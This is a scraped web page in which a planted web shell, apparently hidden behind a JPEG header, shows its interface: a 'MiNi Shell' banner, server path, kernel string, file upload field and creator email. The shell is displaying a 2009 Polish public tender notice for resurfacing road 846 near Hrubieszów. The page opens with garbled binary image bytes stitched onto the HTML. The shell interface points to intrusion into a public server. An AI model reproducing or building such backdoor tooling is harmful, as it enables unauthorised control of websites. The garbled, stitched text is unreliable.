JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090521/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090521/159258-N-2009.html

<p class="kh_header"><b>Hrubieszów: Remont nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn:

Zad. 1. Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Jarosławiec w km 38+445 ÷ 40+345 dł. 1,900 km.

Zad. 2. Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Wojsławice w km 27+915 ÷ 28+315 dł. 0,400 km.</b><br>
<b>Numer ogłoszenia: 159258 - 2009; data zamieszczenia: 21.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Lublinie Rejon Dróg Wojewódzkich w Hrubieszowie , ul. Grabowiecka 18b, 22-500 Hrubieszów, woj. lubelskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn:

Zad. 1. Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Jarosławiec w km 38+445 ÷ 40+345 dł. 1,900 km.

Zad. 2. Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Wojsławice w km 27+915 ÷ 28+315 dł. 0,400 km..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn:

Zad. 1. Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Jarosławiec w km 38+445 ÷ 40+345 dł. 1,900 km.
1)	roboty pomiarowe przy liniowych robotach ziemnych,
2)	frezowanie nawierzchni bitumicznej gr. do  4 cm z wywozem materiału z rozbiórki na odl. do 1 km,
3)	oczyszczenie mechaniczne nawierzchni drogowych bitumicznych,
4)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod wyrównanie),
5)	wyrównanie istniejącej podbudowy betonem asfaltowym,
6)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod w-wę wiążącą),
7)	wykonanie warstwy  wiążącej gr. 4 cm z  betonu asfaltowego,
8)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod w-wę ścieralną),
9)	wykonanie warstwy ścieralnej gr. 4 cm z betonu asfaltowego,
10)	mechaniczne wykonanie oznakowania poziomego farbą akrylową (cienkowarstwowe) zgodnie 
z projektem stałej organizacji ruchu - linie segregacyjne i krawędziowe.
11)	mechaniczne wykonanie oznakowania poziomego za pomocą mas chemoutwardzalnych (grubowarstwowe) zgodnie z projektem stałej organizacji ruchu - przejścia dla pieszych,
12)	uzupełnienie poboczy mieszanką stabilizującą  0-31,5 mm  szerokości 1,0 mb w miejscach wskazanych  przez Zamawiającego.

Zad. 2. Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Wojsławice w km 27+915 ÷ 28+315 dł. 0,400 km.
1)	roboty pomiarowe przy liniowych robotach ziemnych,
2)	frezowanie nawierzchni bitumicznej gr do 4 cm z wywozem materiału z rozbiórki na odl. do 1 km,
3)	regulacja kratek ściekowych,
4)	rozebranie krawężników betonowych na podsypce cementowo - piaskowej,
5)	ustawienie krawężników betonowych 20x30 z wykonaniem ław betonowych na podsypce cementowo -piaskowej z wykonaniem oporu,
6)	oczyszczenie mechaniczne nawierzchni drogowych bitumicznych,
7)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod wyrównanie),
8)	wyrównanie istniejącej podbudowy betonem asfaltowym,
9)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod w-wę ścieralną),
10)	wykonanie warstwy ścieralnej gr. 5 cm z betonu asfaltowego,
11)	mechaniczne wykonanie oznakowania poziomego farbą akrylową (cienkowarstwowe) zgodnie 
z projektem stałej organizacji ruchu,

Wartość zamówienia zadanie nr 1: 1 083 826,89 zł
Wartość zamówienia zadanie nr 2: 145 680,04 zł
Łączna wartość zamówienia: 1 229 506,93 zł.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.52-0, 45.23.32.21-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje składania wadium do powyższego postępowania<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W  przetargu  mogą  wziąć   udział  Wykonawcy,  którzy  udokumentują przez  stosowne dokumenty lub oświadczenia, że spełniają następujące warunki:
1) Są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami ustawowymi.
2) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy  nakładają obowiązek posiadania takich uprawnień.	
    a) Wykonanie  w   ciągu   ostatnich  5   lat   przed  wszczęciem  postępowania  o  udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 3 robót budowlanych odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia.
3) Posiadają  niezbędną  wiedzę  i  doświadczenie oraz  dysponują  potencjałem  technicznym 
i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych  podmiotów   do  udostępnienia   potencjału  technicznego  i  osób  zdolnych   do wykonania zamówienia.	
    a) dysponowanie  minimum 1osobą dla każdego zadania, zdolną do pełnienia funkcji kierownika budowy dla branży drogowej, posiadającą uprawnienia budowlane 
w specjalności drogowej oraz aktualne zaświadczenie odpowiedniego organu samorządu zawodowego o wymaganym ubezpieczeniu od odpowiedzialności cywilnej, lub przedstawienie pisemnego zobowiązania/ń innego/ych podmiotu/ów do udostępnienia osoby/ób posiadającej/ych wymagane uprawnienia zdolnej/ych do wykonania zamówienia.  Wyżej wymieniona  liczba  osób pełniących  funkcję  kierownika budowy  winna  być zapewniona także w trakcie realizacji robót.
    b) dysponowanie jednostkami sprzętu i środkami transportu lub przedstawienie pisemnego zobowiązania/ń innego/ych podmiotu/ów do udostępnienia potencjału technicznego, wymienionymi poniżej:

Walec ogumiony samojezdny	szt. 1
Walec stalowy wibracyjny szt. 2
Skrapiarka samojezdna szt. 1
Szczotka mechaniczna szt. 1
Rozściełacz mas bitumicznych szt. 1
Malowarka do oznakowania poziomego	szt. 1
Samochód samowyładowczy	szt. 3
Ładowarka szt. 1
Frezarka do asfaltu	 szt. 1
Samochód dostawczy szt. 2

4) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
5) Nie  podlegają  wykluczeniu  z  postępowania  o  udzielenie  zamówienia  na  podstawie 
art. 24 ustawy Prawo zamówień publicznych.
2. W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia publicznego Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich 
w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawach zamówienia publicznego.
3. Ocena spełniania warunków, dokonywana będzie w następujący sposób: spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia ważności oferty i spełnienia warunków podmiotowych, Wykonawca załączy do oferty następujące oświadczenia lub  dokumenty:
1) Dokument  uprawniający  Wykonawcę  do  występowania  w  obrocie  prawnym, zgodnie z wymaganiami ustawowymi - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, dokument potwierdzający prawo do reprezentowania podmiotu przez osoby podpisujące ofertę, w przypadku podpisania oferty i innych dokumentów przez osoby, które nie są wymienione w odpisie albo zaświadczeniu.
2) Oświadczenie  o  spełnieniu  warunków  art.  22  ust.  1  pkt. 1 - 4  ustawy  Prawo zamówień publicznych.	
    3) Wykaz minimum 3 robót, zrealizowanych przez Wykonawcę w ostatnich 5 latach przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy w tym okresie wraz z załączonymi dokumentami potwierdzającymi, że roboty te zostały wykonana należycie.
4) Aktualne zaświadczenie  właściwego Naczelnika  Urzędu  Skarbowego   oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
5) Wykaz potencjału kadrowego przewidzianego do realizacji zamówienia ze wskazaniem zakresu wykonywanych przez niego czynności, zawierający informacje o: dysponowaniu osobą zdolną do pełnienia funkcji kierownika budowy dla branży drogowej wraz z załączoną kserokopią/kserokopiami uprawnień budowlanych w specjalności drogowej, kserokopią/kserokopiami aktualnego zaświadczenia odpowiedniego organu samorządu zawodowego o wymaganym ubezpieczeniu od odpowiedzialności cywilnej. W przypadku udostępnienia osoby/ób zdolnej/ych do wykonania zamówienia przez inny podmiot/y do oferty należy dołączyć pisemne zobowiązanie tego podmiotu/ów do jej/ich udostępnienia.
6) Wykaz  potencjału  technicznego  przewidzianego do realizacji zamówienia. W przypadku udostępnienia potencjału technicznego przez inny podmiot/y do oferty należy dołączyć pisemne zobowiązanie tego podmiotu/ów do jego udostępnienia.

2. Jak również Wykonawca obowiązany jest dołączyć do oferty:

1) Ofertę przetargową (z ceną brutto, netto i z podatkiem VAT) 2)	W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.

3) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru albo zaświadczeniu o wpisie do ewidencji działalności gospodarczej, do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdw.lublin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rejon Dróg Wojewódzkich 
w Hrubieszowie, ul. Grabowiecka 18 b 22-500 Hrubieszów 
w cenie 52,00 zł lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 10:10, miejsce: Rejon Dróg Wojewódzkich 
w Hrubieszowie, ul. Grabowiecka 18 b 22-500 Hrubieszów w Sekretariacie.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoby uprawnione do porozumiewania się z Wykonawcami. 
1)  W sprawach technicznych - Paweł Kozdroń  tel. (0-84) 696-20-93 w godz. 8-14.
2) W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia 
i zawarciem umowy - Pasieka Robert tel. ( 0-84) 696-20-93 w godz. 8-14.

Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zad. 1. Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Jarosławiec w km 38+445 ÷ 40+345 dł. 1,900 km..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	roboty pomiarowe przy liniowych robotach ziemnych,
2)	frezowanie nawierzchni bitumicznej gr. do  4 cm z wywozem materiału z rozbiórki na odl. do 1 km,
3)	oczyszczenie mechaniczne nawierzchni drogowych bitumicznych,
4)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod wyrównanie),
5)	wyrównanie istniejącej podbudowy betonem asfaltowym,
6)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod w-wę wiążącą),
7)	wykonanie warstwy  wiążącej gr. 4 cm z  betonu asfaltowego,
8)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod w-wę ścieralną),



9)	wykonanie warstwy ścieralnej gr. 4 cm z betonu asfaltowego,
10)	mechaniczne wykonanie oznakowania poziomego farbą akrylową (cienkowarstwowe) zgodnie 
z projektem stałej organizacji ruchu - linie segregacyjne i krawędziowe.
11)	mechaniczne wykonanie oznakowania poziomego za pomocą mas chemoutwardzalnych (grubowarstwowe) zgodnie z projektem stałej organizacji ruchu - przejścia dla pieszych,
12)	uzupełnienie poboczy mieszanką stabilizującą  0-31,5 mm  szerokości 1,0 mb w miejscach wskazanych  przez Zamawiającego
Wartość zamówienia 1 083 826,89.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.52-0, 45.23.32.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie remontu nawierzchni w ciągu drogi wojewódzkiej nr 846 Małochwiej Duży - Teratyn w m. Wojsławice w km 27+915 ÷ 28+315 dł. 0,400 km..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	roboty pomiarowe przy liniowych robotach ziemnych,
2)	frezowanie nawierzchni bitumicznej gr do 4 cm z wywozem materiału z rozbiórki na odl. do 1 km,
3)	regulacja kratek ściekowych,
4)	rozebranie krawężników betonowych na podsypce cementowo - piaskowej,
5)	ustawienie krawężników betonowych 20x30 z wykonaniem ław betonowych na podsypce cementowo -piaskowej z wykonaniem oporu,
6)	oczyszczenie mechaniczne nawierzchni drogowych bitumicznych,
7)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod wyrównanie),
8)	wyrównanie istniejącej podbudowy betonem asfaltowym,
9)	skropienie nawierzchni emulsją asfaltową szybkorozpadową (pod w-wę ścieralną),
10)	wykonanie warstwy ścieralnej gr. 5 cm z betonu asfaltowego,
11)	mechaniczne wykonanie oznakowania poziomego farbą akrylową (cienkowarstwowe) zgodnie 
z projektem stałej organizacji ruchu,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.52-0, 45.23.32.21-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.08.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com